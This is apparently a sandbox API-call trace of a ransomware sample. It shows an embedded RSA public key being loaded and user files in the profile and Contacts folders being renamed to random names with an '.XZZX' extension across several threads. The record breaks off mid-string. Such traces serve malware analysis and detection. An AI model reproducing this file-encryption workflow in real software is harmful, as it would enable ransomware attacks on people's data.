lpString2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms" | out: lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms" [0227.626] lstrcpyW (in: lpString1=0x2dae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0227.626] SetErrorMode (uMode=0x1) returned 0x1 [0227.626] lstrcpyW (in: lpString1=0x2daf860, lpString2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms" | out: lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms" [0227.626] CoCreateGuid (in: pguid=0x2dae440 | out: pguid=0x2dae440*(Data1=0x74aa5cee, Data2=0xd99a, Data3=0x4c00, Data4=([0]=0xa2, [1]=0xb4, [2]=0x7d, [3]=0x99, [4]=0x25, [5]=0x2f, [6]=0xdf, [7]=0x3e))) returned 0x0 [0227.626] wsprintfW (in: param_1=0x2daec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 126 [0227.626] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2dafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0227.626] wsprintfW (in: param_1=0x2dae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\9741A52C4099B80074AA5CEE43749C48.XZZX") returned 71 [0227.626] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch="XZZX") returned 0x0 [0227.626] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", dwFileAttributes=0x20) returned 1 [0227.627] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000002.regtrans-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 868 os_tid = 0x1094 [0227.791] lstrcpyA (in: lpString1=0x2dafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0227.791] lstrcpyW (in: lpString1=0x2daf460, lpString2="278D60903B72BF40F401616C3FAFA388.XZZX" | out: lpString1="278D60903B72BF40F401616C3FAFA388.XZZX") returned="278D60903B72BF40F401616C3FAFA388.XZZX" [0227.791] lstrcpyW (in: lpString1=0x2dae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" [0227.791] SetErrorMode (uMode=0x1) returned 0x1 [0227.791] lstrcpyW (in: lpString1=0x2daf860, lpString2="278D60903B72BF40F401616C3FAFA388.XZZX" | out: lpString1="278D60903B72BF40F401616C3FAFA388.XZZX") returned="278D60903B72BF40F401616C3FAFA388.XZZX" [0227.792] CoCreateGuid (in: pguid=0x2dae440 | out: pguid=0x2dae440*(Data1=0x1e045803, Data2=0xcb0e, Data3=0x4cd5, Data4=([0]=0xbd, [1]=0xc8, [2]=0x3b, [3]=0x6, [4]=0xa7, [5]=0xaf, [6]=0xa, [7]=0x13))) returned 0x0 [0227.792] wsprintfW (in: param_1=0x2daec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\278D60903B72BF40F401616C3FAFA388.XZZX") returned 80 [0227.792] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2dafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0227.792] wsprintfW (in: param_1=0x2dae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\1607312A3CF11AA61E0458033FCBFEEE.XZZX") returned 80 [0227.792] StrStrW (lpFirst="278D60903B72BF40F401616C3FAFA388.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 869 os_tid = 0x1098 [0227.938] lstrcpyA (in: lpString1=0x2dafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0227.938] lstrcpyW (in: lpString1=0x2daf460, lpString2="3180D48C036A6FAAA02E258A076353F2.XZZX" | out: lpString1="3180D48C036A6FAAA02E258A076353F2.XZZX") returned="3180D48C036A6FAAA02E258A076353F2.XZZX" [0227.938] lstrcpyW (in: lpString1=0x2dae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" [0227.938] SetErrorMode (uMode=0x1) returned 0x1 [0227.938] lstrcpyW (in: lpString1=0x2daf860, lpString2="3180D48C036A6FAAA02E258A076353F2.XZZX" | out: lpString1="3180D48C036A6FAAA02E258A076353F2.XZZX") returned="3180D48C036A6FAAA02E258A076353F2.XZZX" [0227.938] CoCreateGuid (in: pguid=0x2dae440 | out: pguid=0x2dae440*(Data1=0x4017ec9a, Data2=0xcad4, Data3=0x44b2, Data4=([0]=0xab, [1]=0xa2, [2]=0x3c, [3]=0x92, [4]=0x34, [5]=0xdb, [6]=0x1, [7]=0x1a))) returned 0x0 [0227.938] wsprintfW (in: param_1=0x2daec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\3180D48C036A6FAAA02E258A076353F2.XZZX") returned 80 [0227.938] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2dafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0227.938] wsprintfW (in: param_1=0x2dae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\F4817388366D57684017EC9A39483BB0.XZZX") returned 80 [0227.938] StrStrW (lpFirst="3180D48C036A6FAAA02E258A076353F2.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 870 os_tid = 0x109c [0228.096] lstrcpyA (in: lpString1=0x2dafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0228.096] lstrcpyW (in: lpString1=0x2daf460, lpString2="4C9E88000CB6CC7042EF328010E3B0B8.XZZX" | out: lpString1="4C9E88000CB6CC7042EF328010E3B0B8.XZZX") returned="4C9E88000CB6CC7042EF328010E3B0B8.XZZX" [0228.096] lstrcpyW (in: lpString1=0x2dae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" [0228.096] SetErrorMode (uMode=0x1) returned 0x1 [0228.096] lstrcpyW (in: lpString1=0x2daf860, lpString2="4C9E88000CB6CC7042EF328010E3B0B8.XZZX" | out: lpString1="4C9E88000CB6CC7042EF328010E3B0B8.XZZX") returned="4C9E88000CB6CC7042EF328010E3B0B8.XZZX" [0228.096] CoCreateGuid (in: pguid=0x2dae440 | out: pguid=0x2dae440*(Data1=0x283a6b82, Data2=0xce31, Data3=0x4a12, Data4=([0]=0x99, [1]=0xe6, [2]=0xa, [3]=0xaa, [4]=0x7d, [5]=0x17, [6]=0x36, [7]=0x64))) returned 0x0 [0228.096] wsprintfW (in: param_1=0x2daec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\4C9E88000CB6CC7042EF328010E3B0B8.XZZX") returned 80 [0228.096] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2dafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0228.096] wsprintfW (in: param_1=0x2dae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\B5B12FE23BA8A972283A6B823E838DBA.XZZX") returned 80 [0228.096] StrStrW (lpFirst="4C9E88000CB6CC7042EF328010E3B0B8.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 871 os_tid = 0x10a0 [0228.259] lstrcpyA (in: lpString1=0x2dafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0228.259] lstrcpyW (in: lpString1=0x2daf460, lpString2="63AB35AD17277526536F22E31B54596E.XZZX" | out: lpString1="63AB35AD17277526536F22E31B54596E.XZZX") returned="63AB35AD17277526536F22E31B54596E.XZZX" [0228.259] lstrcpyW (in: lpString1=0x2dae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" [0228.259] SetErrorMode (uMode=0x1) returned 0x1 [0228.259] lstrcpyW (in: lpString1=0x2daf860, lpString2="63AB35AD17277526536F22E31B54596E.XZZX" | out: lpString1="63AB35AD17277526536F22E31B54596E.XZZX") returned="63AB35AD17277526536F22E31B54596E.XZZX" [0228.259] CoCreateGuid (in: pguid=0x2dae440 | out: pguid=0x2dae440*(Data1=0xf8b75502, Data2=0xf351, Data3=0x4cc3, Data4=([0]=0xb1, [1]=0xe7, [2]=0x62, [3]=0xd7, [4]=0xec, [5]=0x5d, [6]=0x70, [7]=0x52))) returned 0x0 [0228.259] wsprintfW (in: param_1=0x2daec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\63AB35AD17277526536F22E31B54596E.XZZX") returned 80 [0228.259] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2dafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0228.259] wsprintfW (in: param_1=0x2dae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\B7B2CBA248F562B3F8B755024BD046FB.XZZX") returned 80 [0228.259] StrStrW (lpFirst="63AB35AD17277526536F22E31B54596E.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 872 os_tid = 0x10a4 [0228.406] lstrcpyA (in: lpString1=0x2dafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0228.406] lstrcpyW (in: lpString1=0x2daf460, lpString2="8C424C551A76D4366F1622171E8EB87E.XZZX" | out: lpString1="8C424C551A76D4366F1622171E8EB87E.XZZX") returned="8C424C551A76D4366F1622171E8EB87E.XZZX" [0228.406] lstrcpyW (in: lpString1=0x2dae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" [0228.406] SetErrorMode (uMode=0x1) returned 0x1 [0228.406] lstrcpyW (in: lpString1=0x2daf860, lpString2="8C424C551A76D4366F1622171E8EB87E.XZZX" | out: lpString1="8C424C551A76D4366F1622171E8EB87E.XZZX") returned="8C424C551A76D4366F1622171E8EB87E.XZZX" [0228.406] CoCreateGuid (in: pguid=0x2dae440 | out: pguid=0x2dae440*(Data1=0x6ab016b7, Data2=0xf6dd, Data3=0x4546, Data4=([0]=0xbd, [1]=0x33, [2]=0xf7, [3]=0xa1, [4]=0x6f, [5]=0x6b, [6]=0x49, [7]=0xf))) returned 0x0 [0228.406] wsprintfW (in: param_1=0x2daec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\8C424C551A76D4366F1622171E8EB87E.XZZX") returned 80 [0228.406] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2dafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0228.406] wsprintfW (in: param_1=0x2dae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\4FD775FB42CD116E6AB016B745A7F5B6.XZZX") returned 80 [0228.406] StrStrW (lpFirst="8C424C551A76D4366F1622171E8EB87E.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 873 os_tid = 0x10a8 [0228.562] lstrcpyA (in: lpString1=0x2dafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0228.562] lstrcpyW (in: lpString1=0x2daf460, lpString2="8DFF43342C68841C83BDE75D30616864.XZZX" | out: lpString1="8DFF43342C68841C83BDE75D30616864.XZZX") returned="8DFF43342C68841C83BDE75D30616864.XZZX" [0228.562] lstrcpyW (in: lpString1=0x2dae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" [0228.562] SetErrorMode (uMode=0x1) returned 0x1 [0228.562] lstrcpyW (in: lpString1=0x2daf860, lpString2="8DFF43342C68841C83BDE75D30616864.XZZX" | out: lpString1="8DFF43342C68841C83BDE75D30616864.XZZX") returned="8DFF43342C68841C83BDE75D30616864.XZZX" [0228.562] CoCreateGuid (in: pguid=0x2dae440 | out: pguid=0x2dae440*(Data1=0x90b23feb, Data2=0x26ee, Data3=0x4baa, Data4=([0]=0xad, [1]=0xe0, [2]=0xcb, [3]=0x6b, [4]=0xd3, [5]=0x1d, [6]=0x8a, [7]=0x16))) returned 0x0 [0228.563] wsprintfW (in: param_1=0x2daec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\8DFF43342C68841C83BDE75D30616864.XZZX") returned 80 [0228.563] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2dafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0228.563] wsprintfW (in: param_1=0x2dae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\FB344E7A0B81940C90B23FEB0E5C7854.XZZX") returned 80 [0228.563] StrStrW (lpFirst="8DFF43342C68841C83BDE75D30616864.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 874 os_tid = 0x10ac [0228.718] lstrcpyA (in: lpString1=0x2dafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0228.718] lstrcpyW (in: lpString1=0x2daf460, lpString2="FD82D02831F226B04645120F361F0AF8.XZZX" | out: lpString1="FD82D02831F226B04645120F361F0AF8.XZZX") returned="FD82D02831F226B04645120F361F0AF8.XZZX" [0228.718] lstrcpyW (in: lpString1=0x2dae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" [0228.718] SetErrorMode (uMode=0x1) returned 0x1 [0228.718] lstrcpyW (in: lpString1=0x2daf860, lpString2="FD82D02831F226B04645120F361F0AF8.XZZX" | out: lpString1="FD82D02831F226B04645120F361F0AF8.XZZX") returned="FD82D02831F226B04645120F361F0AF8.XZZX" [0228.718] CoCreateGuid (in: pguid=0x2dae440 | out: pguid=0x2dae440*(Data1=0x3f723025, Data2=0x6468, Data3=0x43f8, Data4=([0]=0x9c, [1]=0x5f, [2]=0xe5, [3]=0x6a, [4]=0x73, [5]=0x48, [6]=0x97, [7]=0xa1))) returned 0x0 [0228.718] wsprintfW (in: param_1=0x2daec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\FD82D02831F226B04645120F361F0AF8.XZZX") returned 80 [0228.718] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2dafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0228.718] wsprintfW (in: param_1=0x2dae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\613203081AA87CC03F7230251D836108.XZZX") returned 80 [0228.719] StrStrW (lpFirst="FD82D02831F226B04645120F361F0AF8.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 875 os_tid = 0x10b0 [0228.897] lstrcpyA (in: lpString1=0x2dafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC 